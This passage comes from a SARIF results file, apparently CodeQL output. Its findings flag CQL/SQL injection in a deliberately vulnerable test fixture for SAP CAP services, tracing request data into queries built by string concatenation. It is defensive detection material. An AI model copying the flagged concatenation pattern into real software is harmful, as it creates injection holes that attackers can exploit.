value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":336,"startColumn":20,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"ef4fafb0cb633d3e:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":333,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":333,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":333,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":335,"startColumn":72,"endColumn":74}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":335,"startColumn":28,"endColumn":74}},"message":{"text":"\"SELECT ... =\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":335,"startColumn":21,"endColumn":75}},"message":{"text":"cds.ql( ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":335,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":336,"startColumn":20,"endColumn":25}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":333,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":333,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":343,"startColumn":20,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"70bf4adf3ece4680:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":340,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":340,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":340,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":342,"startColumn":72,"endColumn":74}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":342,"startColumn":28,"endColumn":74}},"message":{"text":"`SELECT ... =` + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":342,"startColumn":21,"endColumn":75}},"message":{"text":"cds.ql( ... ` + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":342,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":343,"startColumn":20,"endColumn":25}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":340,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":340,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":350,"startColumn":20,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"b17718767883cb21:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":347,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":347,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":347,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":349,"startColumn":71,"endColumn":73}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":349,"startColumn":28,"endColumn":75}},"message":{"text":"`SELECT ...  ${id}`"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":349,"startColumn":21,"endColumn":76}},"message":{"text":"cds.ql( ... ${id}`)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":349,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":350,"startColumn":20,"endColumn":25}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":347,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":347,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":364,"startColumn":15,"endColumn":20}}}],"partialFingerprints":{"primaryLocationLineHash":"a684f52297f0c4e5:1","primaryLocationStartColumnFingerprint":"8"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":362,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":362,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":362,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":363,"startColumn":72,"endColumn":74}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":363,"startColumn":35,"endColumn":74}},"message":{"text":"\"SELECT ... =\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":363,"startColumn":21,"endColumn":75}},"message":{"text":"cds.par ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":363,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":364,"startColumn":15,"endColumn":20}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":362,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":362,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":370,"startColumn":15,"endColumn":20}}}],"partialFingerprints":{"primaryLocationLineHash":"d550e0002cd278da:1","primaryLocationStartColumnFingerprint":"8"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":368,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":368,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":368,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":369,"startColumn":72,"endColumn":74}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":369,"startColumn":35,"endColumn":74}},"message":{"text":"`SELECT ... =` + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":369,"startColumn":21,"endColumn":75}},"message":{"text":"cds.par ... ` + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":369,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":370,"startColumn":15,"endColumn":20}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":368,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":368,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":376,"startColumn":15,"endColumn":20}}}],"partialFingerprints":{"primaryLocationLineHash":"6a27aa8587353580:1","primaryLocationStartColumnFingerprint":"8"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":374,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":374,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":374,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":375,"startColumn":71,"endColumn":73}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":375,"startColumn":35,"endColumn":75}},"message":{"text":"`SELECT ...  ${id}`"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":375,"startColumn":21,"endColumn":76}},"message":{"text":"cds.par ... ${id}`)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":375,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":376,"startColumn":15,"endColumn":20}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":374,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":374,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":389,"startColumn":15,"endColumn":20}}}],"partialFingerprints":{"primaryLocationLineHash":"69fde7291c8fc74e:1","primaryLocationStartColumnFingerprint":"8"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":387,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":387,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":387,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":388,"startColumn":62,"endColumn":64}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":388,"startColumn":25,"endColumn":64}},"message":{"text":"\"SELECT ... =\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":388,"startColumn":21,"endColumn":65}},"message":{"text":"CQL(\"SE ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":388,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":389,"startColumn":15,"endColumn":20}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":387,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":387,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":395,"startColumn":15,"endColumn":20}}}],"partialFingerprints":{"primaryLocationLineHash":"98c9d206b1717b43:1","primaryLocationStartColumnFingerprint":"8"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":393,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":393,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":393,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":394,"startColumn":62,"endColumn":64}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":394,"startColumn":25,"endColumn":64}},"message":{"text":"`SELECT ... =` + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":394,"startColumn":21,"endColumn":65}},"message":{"text":"CQL(`SE ... ` + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":394,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":395,"startColumn":15,"endColumn":20}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":393,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":393,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":401,"startColumn":15,"endColumn":20}}}],"partialFingerprints":{"primaryLocationLineHash":"d013e7d9793c061d:1","primaryLocationStartColumnFingerprint":"8"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":399,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":399,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":399,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":400,"startColumn":61,"endColumn":63}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":400,"startColumn":25,"endColumn":65}},"message":{"text":"`SELECT ...  ${id}`"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":400,"startColumn":21,"endColumn":66}},"message":{"text":"CQL(`SE ... ${id}`)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":400,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":401,"startColumn":15,"endColumn":20}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":399,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":399,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":415,"startColumn":20,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"3fb9a1da0acd43ae:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":412,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":412,"startColumn":13,"endColumn":19}},"message":{"text":"{ id 